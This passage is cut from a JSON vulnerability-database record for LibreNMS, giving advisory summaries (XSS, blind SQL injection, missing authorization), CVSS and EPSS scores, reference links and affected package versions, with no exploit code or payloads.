Scripting (XSS) vulnerability in the \"Services\" section of the Device Overview page allows authenticated users to inject arbitrary JavaScript through the \"name\" parameter when adding a service to a device. This vulnerability could result in the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and enabling unauthorized actions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-50352","reference_id":"","reference_type":"","scores":[{"value":"0.11787","scoring_system":"epss","scoring_elements":"0.9385","published_at":"2026-06-06T12:55:00Z"},{"value":"0.11787","scoring_system":"epss","scoring_elements":"0.93854","published_at":"2026-06-09T12:55:00Z"},{"value":"0.11787","scoring_system":"epss","scoring_elements":"0.93848","published_at":"2026-06-08T12:55:00Z"},{"value":"0.11787","scoring_system":"epss","scoring_elements":"0.93849","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-50352"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/b4af778ca42c5839801f16ece53505bb7fa1e7bc","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T16:11:34Z/"}],"url":"https://github.com/librenms/librenms/commit/b4af778ca42c5839801f16ece53505bb7fa1e7bc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-50352","reference_id":"CVE-2024-50352","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-50352"},{"reference_url":"https://github.com/advisories/GHSA-qr8f-5qqg-j3wg","reference_id":"GHSA-qr8f-5qqg-j3wg","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qr8f-5qqg-j3wg"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-qr8f-5qqg-j3wg","reference_id":"GHSA-qr8f-5qqg-j3wg","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T16:11:34Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-qr8f-5qqg-j3wg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74125?format=json","purl":"pkg:composer/librenms/librenms@24.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.10.0"}],"aliases":["CVE-2024-50352","GHSA-qr8f-5qqg-j3wg"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vepx-waum-1bfc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/110320?format=json","vulnerability_id":"VCID-w5dm-5pyj-cfef","summary":"Cross-site Scripting in librenms/librenms\nCross-site Scripting (XSS) - Stored in GitHub repository librenms/librenms prior to 22.10.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-3516","reference_id":"","reference_type":"","scores":[{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00604","published_at":"2026-06-05T12:55:00Z"},{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00602","published_at":"2026-06-09T12:55:00Z"},{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00599","published_at":"2026-06-08T12:55:00Z"},{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00603","published_at":"2026-06-07T12:55:00Z"},{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00606","published_at":"2026-06-06T12:55:00Z"},{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00608","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-3516"},{"reference_url":"https://github.com/librenms/librenms/commit/8e85698aa3aa4884c2f3d6c987542477eb64f07c","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:H"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-25T20:37:55Z/"}],"url":"https://github.com/librenms/librenms/commit/8e85698aa3aa4884c2f3d6c987542477eb64f07c"},{"reference_url":"https://huntr.dev/bounties/734bb5eb-715c-4b64-bd33-280300a63748","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:H"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-25T20:37:55Z/"}],"url":"https://huntr.dev/bounties/734bb5eb-715c-4b64-bd33-280300a63748"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3516","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3516"},{"reference_url":"https://github.com/advisories/GHSA-r4gq-hv2r-mrf5","reference_id":"GHSA-r4gq-hv2r-mrf5","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r4gq-hv2r-mrf5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/148559?format=json","purl":"pkg:composer/librenms/librenms@22.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@22.10.0"}],"aliases":["CVE-2022-3516","GHSA-r4gq-hv2r-mrf5"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w5dm-5pyj-cfef"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46027?format=json","vulnerability_id":"VCID-w9mu-bbkx-sbeq","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in librenms/librenms.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4981","reference_id":"","reference_type":"","scores":[{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16458","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16539","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16581","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16473","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16584","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4981"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/03c4da62c8acde0a82acbb4a445ae866ebfdd3f7","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-09-20T17:28:46Z/"}],"url":"https://github.com/librenms/librenms/commit/03c4da62c8acde0a82acbb4a445ae866ebfdd3f7"},{"reference_url":"https://huntr.dev/bounties/1f014494-49a9-4bf0-8d43-a675498b9609","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-09-20T17:28:46Z/"}],"url":"https://huntr.dev/bounties/1f014494-49a9-4bf0-8d43-a675498b9609"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4981","reference_id":"CVE-2023-4981","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4981"},{"reference_url":"https://github.com/advisories/GHSA-5jjm-qp48-qp86","reference_id":"GHSA-5jjm-qp48-qp86","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5jjm-qp48-qp86"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/66945?format=json","purl":"pkg:composer/librenms/librenms@23.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@23.9.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2023-4981","GHSA-5jjm-qp48-qp86"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w9mu-bbkx-sbeq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/47531?format=json","vulnerability_id":"VCID-whxh-v47a-8yhh","summary":"LibreNMS vulnerable to a Time-Based Blind SQL injection leads to database extraction\nGet a valid API token, make sure you can access api functions, then replace string on my PoC code, Test on offical OVA image, it's a old version 23.9.1, but this vulerable is also exists on latest version 24.2.0","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-32480","reference_id":"","reference_type":"","scores":[{"value":"0.00405","scoring_system":"epss","scoring_elements":"0.61375","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00405","scoring_system":"epss","scoring_elements":"0.61355","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00405","scoring_system":"epss","scoring_elements":"0.61373","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00405","scoring_system":"epss","scoring_elements":"0.61386","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00405","scoring_system":"epss","scoring_elements":"0.61379","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-32480"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/83fe4b10c440d69a47fe2f8616e290ba2bd3a27c","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-04-23T00:21:00Z/"}],"url":"https://github.com/librenms/librenms/commit/83fe4b10c440d69a47fe2f8616e290ba2bd3a27c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-32480","reference_id":"CVE-2024-32480","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-32480"},{"reference_url":"https://github.com/advisories/GHSA-jh57-j3vq-h438","reference_id":"GHSA-jh57-j3vq-h438","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jh57-j3vq-h438"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-jh57-j3vq-h438","reference_id":"GHSA-jh57-j3vq-h438","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-04-23T00:21:00Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-jh57-j3vq-h438"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/69846?format=json","purl":"pkg:composer/librenms/librenms@24.4.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.4.0"}],"aliases":["CVE-2024-32480","GHSA-jh57-j3vq-h438"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-whxh-v47a-8yhh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/42436?format=json","vulnerability_id":"VCID-wkt4-vdr8-mkgk","summary":"Missing Authorization in librenms/librenms\nMissing Authorization in Packagist librenms/librenms prior to 22.2.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0588","reference_id":"","reference_type":"","scores":[{"value":"2e-05","scoring_system":"epss","scoring_elements":"0.00043","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0588"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/95970af78e4c899744a715766d744deef8c505f7","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/commit/95970af78e4c899744a715766d744deef8c505f7"},{"reference_url":"https://huntr.dev/bounties/caab3310-0d70-4c8a-8768-956f8dd3326d","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/caab3310-0d70-4c8a-8768-956f8dd3326d"},{"reference_url":"https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0588","reference_id":"CVE-2022-0588","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0588"},{"reference_url":"https://github.com/advisories/GHSA-254q-rqmw-vx45","reference_id":"GHSA-254q-rqmw-vx45","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-254q-rqmw-vx45"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/60660?format=json","purl":"pkg:composer/librenms/librenms@22.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13ug-m6cb-hbcc"},{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3b6p-2q4u-kkb5"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7fbt-znx9-ukaj"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-7srz-umtt-n7e1"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-b67g-878z-sygx"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"